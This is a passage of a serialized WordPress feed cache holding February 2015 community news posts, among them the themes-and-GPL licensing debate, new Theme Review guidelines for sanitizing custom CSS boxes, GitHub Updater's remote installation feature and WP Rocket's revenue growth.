with the assessment which lead Mullenweg to insinuate <a title=\"http://thenextweb.com/socialmedia/2010/07/14/wordpress-and-thesis-go-to-battle-mullenweg-may-sue/\" href=\"http://thenextweb.com/socialmedia/2010/07/14/wordpress-and-thesis-go-to-battle-mullenweg-may-sue/\">he would take the matter to court</a>.</p>\n<p>Five years after that memorable debate, Richard Best of WP and Legal Stuff, <a title=\"http://wpandlegalstuff.com/wordpress-themes-gpl-conundrum-derivative-works/\" href=\"http://wpandlegalstuff.com/wordpress-themes-gpl-conundrum-derivative-works/\">has published a thorough analysis</a> of WordPress themes, the GPL license, and what is a derivative work. His post is a breath of fresh air and the best I’ve read so far on the subject. Best doesn’t sell themes or plugins in the WordPress ecosystem giving him a neutral position to discuss the matter. He also has a legal background, but does not offer legal advice through his site.</p>\n<p>Determining what defines a derivative work is complex, but according to Best, no one truly knows the answer to the question:</p>\n<blockquote><p>The reason we don’t truly know the answer is that the courts haven’t decided a case that is squarely on point (there are potentially analogous cases, of course, but – as far as I’m aware – no GPL or similar case directly on point). It is only the courts (in the absence of legislative intervention) that can finally determine the matter.</p>\n<p>Courts might apply what some might say are orthodox notions of what it means for something to be a derivative work or they might incrementally (some might say dangerously) develop the law on this point but we just don’t know. And even if the courts of one country made a definitive ruling on the point, courts in other countries – where other lawsuits might be commenced – could decide differently. As a result, uncertainty remains.</p></blockquote>\n<p>The debate against Thesis never went to court, but it spawned several conversations throughout the WordPress community, <a title=\"http://www.chipbennett.net/2010/07/20/wordpress-themes-gpl-and-copyright-case-law/\" href=\"http://www.chipbennett.net/2010/07/20/wordpress-themes-gpl-and-copyright-case-law/\"> like this one from Chip Bennett</a>. This is why <a title=\"http://thenextweb.com/socialmedia/2010/07/14/wordpress-and-thesis-go-to-battle-mullenweg-may-sue/#comment-1584821297\" href=\"http://thenextweb.com/socialmedia/2010/07/14/wordpress-and-thesis-go-to-battle-mullenweg-may-sue/#comment-1584821297\">some people</a> rallied for a court case to settle the matter once and for all. As far as WordPress is concerned, I think it’s unlikely a court case will ever take place.</p>\n<h2>Influence Instead of Lawyers</h2>\n<p>Mullenweg has other ways of influencing people to license their WordPress products 100% GPL which doesn’t require a lawyer. A good example is <a title=\"http://designcrumbs.com/automatically-blackballed\" href=\"http://designcrumbs.com/automatically-blackballed\">when Jake Caputo was banned</a> from speaking or participating at WordCamps because he didn’t license his themes 100% GPL on ThemeForest.</p>\n<p>After going back and forth in <a title=\"http://marketblog.envato.com/news/survey-results-about-gpl-opt-in-choice/\" href=\"http://marketblog.envato.com/news/survey-results-about-gpl-opt-in-choice/\">public debates</a>, ThemeForest <a title=\"http://marketblog.envato.com/general/100-gpl-option-now-available-plus-woothemes-arrives/\" href=\"http://marketblog.envato.com/general/100-gpl-option-now-available-plus-woothemes-arrives/\">eventually added the ability</a> for authors to choose between split-license and 100% GPL. After changing the license on all of his products to 100% GPL, Caputo was allowed to speak at WordCamps again. It’s this type of influence that prevents arguments from reaching the court system.</p>\n<h2>Only a Court Can Decide</h2>\n<p>There aren’t many posts these days debating the merits of GPL and WordPress. Best does a great job explaining why (emphasis mine):</p>\n<blockquote><p>I think the GPL/theme debate has reached the stage where it’s fair to say that a significant proportion of the WordPress community now frowns upon premium theme providers who either don’t GPL-license at all or (probably to a lesser extent) split-license their themes. That might not be good for business and that, for some, may be the bottom line.</p>\n<p>For some people, this frowning may be caused by a particular view of what the GPL requires <em>but</em> for others – and I think this is a particularly important point – it may be caused by a recognition of the enormous opportunities that WordPress makes possible and the open source spirit and generosity that pervades much of the WordPress community. <strong>I think we’ve reached the stage where, for some people, this is more about a community norm than it is about a strict reading of the GPL </strong>(not to mention the tedium of listening to more and more competing GPL arguments when, ultimately, only a court can decide).</p></blockquote>\n<p>If a debate like the one in 2010 were to happen again, I think we’d see a huge outcry from every corner of the community for a court case to settle the matter. After all, without that, everything else is a moot point, right? If you sell commercial WordPress themes and plugins, I highly encourage you to read his post. Also read his thoughts on a somewhat related topic, the <a title=\"http://wpandlegalstuff.com/gpl-assumptions-automatic-inheritance/\" href=\"http://wpandlegalstuff.com/gpl-assumptions-automatic-inheritance/\">assumptions of GPL and automatic inheritance</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Feb 2015 00:37:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: WordPress Theme Review Team Sets New Guidelines for Custom CSS Boxes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38826\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"http://wptavern.com/wordpress-theme-review-team-sets-new-guidelines-for-custom-css-boxes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2252:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/css.jpg\" rel=\"prettyphoto[38826]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/css.jpg?resize=1024%2C491\" alt=\"css\" class=\"aligncenter size-full wp-image-38846\" /></a></p>\n<p>Custom CSS boxes in themes are a common feature that allow users to easily add their own styles without having to edit any theme files. The inclusion of this feature in themes, as opposed to plugins, has long been a hotly contested issue among theme developers.</p>\n<p>WordPress.org Theme Review team admin Justin Tadlock <a href=\"https://make.wordpress.org/themes/2015/02/10/custom-css-boxes-in-themes/\" target=\"_blank\">announced</a> today that the team has agreed upon new guidelines for the inclusion of CSS boxes. He summarized the conclusions following the debate:</p>\n<ul>\n<li>It’s preferred that theme authors leave this feature to plugins.</li>\n<li>However, it is allowed if handled safely.</li>\n<li>The edit_theme_options capability is required (like all theme options).</li>\n<li>The wp_filter_nohtml_kses(), wp_strip_all_tags(), or equivalent function must be used to sanitize the data before it’s saved into the database.</li>\n</ul>\n<p>The main issue here is sanitizing the CSS to make sure it’s safe to store in the database. The guidelines do not cover validating the CSS, as that is less of a safety concern.</p>\n<p>While adding custom CSS boxes still falls within theme territory, it is best to consider relegating this feature to a plugin in order to keep your theme safe and lean. If you still wish to offer this feature in your theme, Tadlock <a href=\"https://make.wordpress.org/themes/2015/02/10/custom-css-boxes-in-themes/\" target=\"_blank\">posted sample code</a> that will provide a good starting place for adding a custom CSS box to WordPress’ native customizer.</p>\n<p>Commercial theme authors who want to keep pace with WordPress.org theme review requirements will want to review the updated guidelines. The theme review team recommends using a plugin, such as <a href=\"http://jetpack.me/support/custom-css/\" target=\"_blank\">Jetpack’s custom CSS module</a>, as a safe alternative to allowing the theme to save custom CSS to the database.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Feb 2015 23:53:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: iThemes to Host Free Online Training Event: Intro to WordPress Web Design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38746\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/ithemes-to-host-free-online-training-event-intro-to-wordpress-web-design\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2962:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ithemes-training.jpg\" rel=\"prettyphoto[38746]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ithemes-training.jpg?resize=932%2C445\" alt=\"ithemes-training\" class=\"aligncenter size-full wp-image-38816\" /></a></p>\n<p>iThemes will be conducting a free online training event next week for those who are interested in getting started with WordPress. The <a href=\"https://ithemes.com/2015/02/05/free-intro-wordpress-web-design-workshop-february-18-20-2015/\" target=\"_blank\">Intro to WordPress Web Design</a> course will run from February 18 – 20 and will cover everything from learning how to set up a site to working with plugins and management tools:</p>\n<ul>\n<li>Understand what WordPress is, where it came from, why everything is a “post”—and who is Dolly?</li>\n<li>Unlock your WordPress site – learn how to set up your site the right way</li>\n<li>Unmask WordPress – learn the basics of how WordPress displays content for your site</li>\n<li>Supercharge your WordPress site with plugins</li>\n<li>Simplify your life with WordPress management tools and tips</li>\n<li>What to do to take your knowledge of WordPress to the next level</li>\n</ul>\n<p>The workshop is open to the first 1,000 registrants and will be taught by Benjamin Bradley, iThemes’ Training full-time instructor. Bradley has been working with the company for the past five years to build out a library of 600+ instructional videos for the community surrounding iThemes’ products. A chat room will be available for discussion and Q&A during the the online event.</p>\n<p>iThemes CEO Cory Miller began investing in the creation of training resources years ago after noticing that a lack of quality WordPress education material was putting an extra burden on his support staff. “We started this free online workshop several years ago in response to seeing many of the same questions being asked in our support area year after year,” Miller said.</p>\n<p>“We felt our customers weren’t able to make meaningful progress in learning the basics of WordPress web design because there weren’t good resources to do so. The need is there and it is great, in particular for online learning like this. It’s part of our contribution to building up our customers, but also the greater WordPress community,” he said.</p>\n<p>The event is not just for iThemes customers but is open to anyone. If you can’t attend the training sessions live, iThemes plans to make the recordings available on its blog after the event. If you or a family member, friend, or client want an approachable introduction to WordPress, <a href=\"https://attendee.gotowebinar.com/register/5530303058928143361\" target=\"_blank\">register for the course</a> at iThemes. Each session is only one hour and will put you on track to managing your own WordPress website.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Feb 2015 18:33:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"Matt: On the Tim Ferriss Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44665\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"http://ma.tt/2015/02/on-the-tim-ferriss-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:581:\"<p>I had the great fun the other week of hanging with Tim Ferriss on his podcast, an episode he titled <a href=\"http://fourhourworkweek.com/2015/02/09/matt-mullenweg/\">Matt Mullenweg on Polyphasic Sleep, Tequila, and Building Billion-Dollar Companies</a>. His previous guest <a href=\"http://fourhourworkweek.com/2015/02/02/arnold-schwarzenegger/\">was Arnold Schwarzenegger</a> (!) and if you <a href=\"http://fourhourworkweek.com/category/the-tim-ferriss-show/\">dig into the podcast archives there are some really amazing episodes</a>, I’m working my way through them now.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 10 Feb 2015 18:30:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: GitHub Updater 4.1 to Add Remote Installation for WordPress Plugins and Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38758\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"http://wptavern.com/github-updater-4-1-to-add-remote-installation-for-wordpress-plugins-and-themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3688:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/01/wpvsgithub.jpg\" rel=\"prettyphoto[38758]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/01/wpvsgithub.jpg?resize=1025%2C381\" alt=\"WordPress Versus Github\" class=\"aligncenter size-full wp-image-15216\" /></a></p>\n<p><a href=\"https://github.com/afragen/github-updater\" target=\"_blank\">GitHub Updater</a> is a plugin that developers often use to enable automatic updates to GitHub or Bitbucket-hosted WordPress plugins and themes. The project was started in July 2013 by <a href=\"http://thefragens.com/\" target=\"_blank\">Andy Fragen</a>, a trauma surgeon and plugin developer. Over the past two years GitHub Updater has received improvements from 14 <a href=\"https://github.com/afragen/github-updater/graphs/contributors\" target=\"_blank\">contributors</a>.</p>\n<p>Fragen’s work on GitHub Updater makes it possible for developers to stay in their <a href=\"http://wptavern.com/wordpress-org-vs-github-for-hosting-wordpress-plugins-and-themes\" target=\"_blank\">preferred GitHub/Bitbucket workflow</a> and still ship updates for plugins and themes to their users. After reading about how <a href=\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\" target=\"_blank\">WP Pusher is extending WordPress’ built-in auto updater to deploy remotely hosted themes and plugins</a>, Fragen was inspired to investigate the possibility of adding remote installation of WordPress extensions to his GitHub Updater.</p>\n<p>He now has the <code>develop</code> branch of the project working to successfully install both public and private GitHub or Bitbucket repositories remotely. “I must confess, the hardest part was getting everything in the Settings API functioning,” Fragen said.</p>\n<p>With the help of some code from the <a href=\"https://wordpress.org/plugins/zero-spam/\" target=\"_blank\">WordPress Zero Spam</a> plugin by Ben Marshall, and a few lines from <a href=\"http://tgmpluginactivation.com/\" target=\"_blank\">TGM Plugin Activation</a> by Thomas Griffin, he was able to get a tabbed settings interface in place in addition to the plugin dependency portion of the task.</p>\n<p>“After setting up the tabs in the Settings page I was able to simply create the correct endpoint for GitHub and Bitbucket,” Fragen said. “I thought allowing for private repository remote installation might prove more difficult but a couple of modifications in other parts of the plugin made this relatively painless. It certainly makes downloading a repo from GitHub, renaming it correctly, and then uploading it a single-click experience.”</p>\n<p><a href=\"https://github.com/afragen/github-updater\" target=\"_blank\">GitHub Updater</a> is <a href=\"https://github.com/afragen/github-updater/issues/34\" target=\"_blank\">not allowed in the WordPress.org directory</a>, as the guidelines forbid official plugins from allowing updates from anywhere outside of WordPress.org. Developers usually opt for using the GitHub Updater when they want to host their plugins on GitHub/Bitbucket, or need to provide updates for private repositories.</p>\n<p>The <a href=\"http://thefragens.com/2015/02/github-updater-and-remote-installation/\" target=\"_blank\">4.1 release of GitHub Updater</a> will include both remote installation and automatic updating in one package. If you want to test the functionality now, you can check out the <code>develop</code> branch. Feel free to log your issues and feedback on <a href=\"https://github.com/afragen/github-updater\" target=\"_blank\">GitHub</a>, as Fragen will be incorporating bug fixes into the 4.1 release.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 20:32:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: WP Rocket Grows From $0 to $35K in Monthly Revenue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38729\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://wptavern.com/wp-rocket-grows-from-0-to-35k-in-monthly-revenue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3947:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/WPRocketFeaturedImage.png\" rel=\"prettyphoto[38729]\"><img class=\"aligncenter size-full wp-image-38763\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/WPRocketFeaturedImage.png?resize=672%2C281\" alt=\"WP Rocket Featured Image\" /></a></p>\n<p>WP Media, the company behind WordPress caching plugin WP Rocket, <a title=\"http://blog.wp-rocket.me/transparency-matters/\" href=\"http://blog.wp-rocket.me/transparency-matters/\">published a post</a> that highlights how successful the plugin has been since launching a year and a half ago. When we wrote about the <a title=\"http://wptavern.com/wp-rocket-launches-commercial-caching-plugin-for-wordpress\" href=\"http://wptavern.com/wp-rocket-launches-commercial-caching-plugin-for-wordpress\">international launch of WP Rocket</a>, we questioned whether it would be able to compete against all of the free, robust options available.</p>\n<p>In a show of transparency, WP Media shares stats that indicate the plugin is doing well. Since launching a year and a half ago, WP Rocket has achieved the following milestones while being a 100% bootstrapped company:</p>\n<ul>\n<li>$0 to $35 000 in monthly revenue</li>\n<li>0 to +15 000 websites using WP Rocket</li>\n<li>0 to +4300 customers.</li>\n</ul>\n<p>Despite launching the product without a business plan, customers have shown they’re willing to buy a caching solution that’s simple to configure and use.</p>\n<p>Jean-Baptiste Marchand-Arvier, Co-founder of WP Rocket, says the move towards greater transparency is inspired by other companies that have revealed revenue numbers, recruitment strategies, and productivity tips.</p>\n<blockquote><p>We are really inspired by great companies like <a href=\"https://bufferapp.com/\">Buffer</a>, <a href=\"http://baremetrics.io\">Baremetrics</a> and <a href=\"https://mattermark.com/\">Mattermark</a> where transparency is a company culture. They share it through several channels:</p>\n<ul>\n<li><a href=\"https://open.bufferapp.com\">Buffer Open Blog</a>, “Our journey to greater productivity, more transparency and a happier work culture”</li>\n<li><a href=\"https://medium.com/@DanielleMorrill\">Medium posts of Danielle Morrill</a>, CEO and Cofounder of Mattermark</li>\n<li><a href=\"https://baremetrics.io/blog\">Baremetrics Blog</a></li>\n</ul>\n<p><strong>These companies have helped us greatly</strong> by sharing a lot of internal information including their monthly revenue, and more.</p></blockquote>\n<p>At the end of 2014, <a title=\"https://pippinsplugins.com/2014-review/\" href=\"https://pippinsplugins.com/2014-review/\">Easy Digital Downloads</a> and <a title=\"http://wpninjas.com/2014-review/\" href=\"http://wpninjas.com/2014-review/\">WP Ninjas</a> published year-end reviews that show how well each plugin has done. However, Matt Medeiros, of MattReport.com <a title=\"http://mattreport.com/precursor-greatness/\" href=\"http://mattreport.com/precursor-greatness/\">cautions,</a> that while reading about the success of others can be motivational, it can also be depressing.</p>\n<blockquote><p>Entrepreneurs or small business owners that have been in the game month-after-month or 3 years in still struggling to make it. “Everyone is doing better shit than me.” or “Look at the money they are making! Why can’t I?”</p>\n<p>The new social has amplified everyone else’s success while making yours seem insignificant.</p></blockquote>\n<p>I want to see as many companies as possible open up to their customers and readers by publishing revenue numbers and strategies that don’t work out as intended. Aside from knowing the numbers, I think a lot of people in the community would love to read about the struggles businesses are having and what they’re doing to overcome them.</p>\n<p>WP Rocket is proving that, despite jumping into an established market, there’s enough room for new products to grow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 20:21:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"WPTavern: The First Conference Dedicated to WordPress.com Debuts on March 28th in Portland, OR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38717\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"http://wptavern.com/the-first-conference-dedicated-to-wordpress-com-debuts-on-march-28th-in-portland-or\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2200:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/PressPublishFeaturedImage.png\" rel=\"prettyphoto[38717]\"><img class=\"size-full wp-image-38718\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/PressPublishFeaturedImage.png?resize=668%2C262\" alt=\"Press Publish Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/38072565@N00/462857539\">Publish Akku</a> – <a href=\"https://creativecommons.org/licenses/by-nc/2.0/\">(license)</a>\n<p>Those who use the <a title=\"https://wordpress.org/\" href=\"https://wordpress.org/\">self hosted version of WordPress</a> have access to <a title=\"http://central.wordcamp.org/\" href=\"http://central.wordcamp.org/\">WordCamps</a>, annual conferences dedicated to WordPress. Meanwhile, there has never been a conference focused on WordPress.com.</p>\n<p><a title=\"http://presspublish.events/\" href=\"http://presspublish.events/\">Press Publish</a> is a new <a title=\"http://presspublish.events/2015/02/04/portland-lineup-confirmed/\" href=\"http://presspublish.events/2015/02/04/portland-lineup-confirmed/\">series of events</a> focused on WordPress.com and Jetpack. The first is scheduled for <a title=\"http://presspublish.events/events/portland/\" href=\"http://presspublish.events/events/portland/\">March 28th, 2015 in Portland, OR</a>. There’s also a second event scheduled for <a title=\"http://presspublish.events/events/phoenix/\" href=\"http://presspublish.events/events/phoenix/\">April 18th, 2015 in Phoenix, AZ</a>.</p>\n<p>Each event lasts for one day and has two tracks. Speakers will share their personal success stories on using the WordPress.com platform. There will also be a handful of Automatticians on hand to answer any questions. Registration is open for both events and costs $250.00.</p>\n<p>Press Publish is an opportunity for attendees to learn from some of the brightest minds who make a living publishing content on WordPress.com. It’s also an opportunity for attendees to speak with Automatticians face to face to suggest features or enhancements to the service. The events and locations are part of a pilot program that, if successful, will likely spread to other places around the world.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Feb 2015 20:00:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Initiative Aims to Improve the New User Experience in WordPress 